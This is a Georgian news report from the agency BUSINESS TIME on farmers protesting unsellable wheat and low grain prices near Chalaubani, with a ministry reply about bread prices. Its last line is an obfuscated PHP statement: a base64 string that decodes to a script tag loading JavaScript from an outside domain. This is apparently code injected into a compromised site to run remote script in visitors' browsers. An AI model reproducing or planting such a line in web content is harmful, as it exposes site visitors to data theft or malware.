celsiusi
ავერსი საქკაბელი

თბილისი-ბაკურციხის ავტომაგისტრალზე, სოფელ ჩალაუბანთან ფერმერებმა საპროტესტო აქცია გამართეს. მათივე განმარტებით, ასობით ტონა შარშანდელი ხორბლის რეალიზაცია ვერ ხერხდება.

როგორც მარცვლეულის მწარმოებელთა ასოციაციის ხელმძღვანელმა, ნიკოლოზ ბენიაიძემ BUSINESS TIME-თან განაცხადა, ფერმერები ხელისუფლებას მოუწოდებენ, ქვეყანაში პრიორიტეტი ადგილობრივი წარმოების ხორბალი იყოს. თვლიან რომ, ამისთვის აუცილებელია, ხელისუფლებამ იმპორტული ფქვილზე გადასახადი დააწესოს.

„ყველას მივმართეთ, ყველა საქმის კურსშია, ერთადერთი, 6 თვით გვითხრეს სესხების გადავადება, რაც არაფერს არ გვაძლევს საერთოდ, ამ ფასების პირობებში. საფასო პოლიტიკა არ არსებობს, რუსეთიდან მოედინება ზღვა მოსავალი, შემოაქვთ ფქვილი, ხორბალი და ღერღილი. ყველა ქვეყანამ ირგვლივ დაიცვა თავი, პოლონეთი , უნგრეთი, რუმინეთი, სლოვაკეთი - უკრაინულ ხორბალსაც არ იღებენ, თურქეთმა 130% - ით დაბეგრა იმპორტი, რომ თავიანთი ფერმერები დაიცვან, ყაზახეთმა 6 თვით აკრძალა საერთოდ ტრანზიტი, ყველა იცავს თავიანთ ფერმერებს და ჩვენ დავრჩით მარტო ესე.

ბანკები უკვე გვაყიდინებენ ყველანაირ ფასად მოსავალს, 40 თეთრზეა ჩამოსული, 70 თვითღირებულება გვიზის მინიმუმ, გამოდის მესამედ ფასში უნდა გავყიდოთ.

ჩვენი მოთხოვნა მარტივია, მინიმალურ ფასში, თვითღირებულებაში მაინც გავყიდოთ მარცვლეული. შეუძლებელია შემოთავაზებულ ფასად გაყიდვა, რომელიც თვითღირებულებაზე გაცილებით ნაკლებია". - განაცხადა ბენიაძემ.

ფერმერების შიშობენ, რომ შესაძლოა, სახნავ-სათესი ფართობების დაკარგვის საშიშროების წინაშეც აღმოჩნდნენ, რადგან საწყობების ასაშენებლად და მოსავლის მოსაყვანად აღებული კრედიტის გადახდას ვერ ახერხებენ.

აქციის მონაწილეებმა შეკრების ადგილზე სიმბოლურად ერთი ტომარა ხორბალი დაყარეს და განაცხადეს, რომ  ხელისუფლების მხრიდან თუ არ იქნება რეაგირება, მათი პროტესტი მასშტაბურ ხასიათს მიიღებს.

აღნიშნულ საკითხზე საინფორმაციო სააგენტო BUSINESS TIME სიფლის მეურნეობისა და გარემოს დაცვის სამინისტროს დაუკავშირდა.

როგორც BUSINESS TIME - ს სამინისტროს პრესამსახურში განუცხადეს, მუდმივი კომუნიკაცია აქვს სამინისტროს ფერმერებთან, მათ შესთავაზეს წარმოებაში ხელშეწყობა, თუმცა სახელმწიფოსთვის მნიშვნელოვანია, რომ პურის ფასი არ გაიზარდოს.

„სახელწიფოსთვის მნიშვნელოვანია პურის ფასი არ გაიზარდოს. სხვა რისი რესურსიც აქვს სახელმწიფოს წარმოებაში ხელშეწყობა და მათ შორის სესხების გადავადება სთავაზობს ფერმერებს, თუმცა როგორც გითხარით, ჩვენთვის მნიშვნელოვანია პურის ფასი არ გაიზარდოს" - განაცხადეს პრესამსახურში.

ავტორი
მირანდა შურღაია
348
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");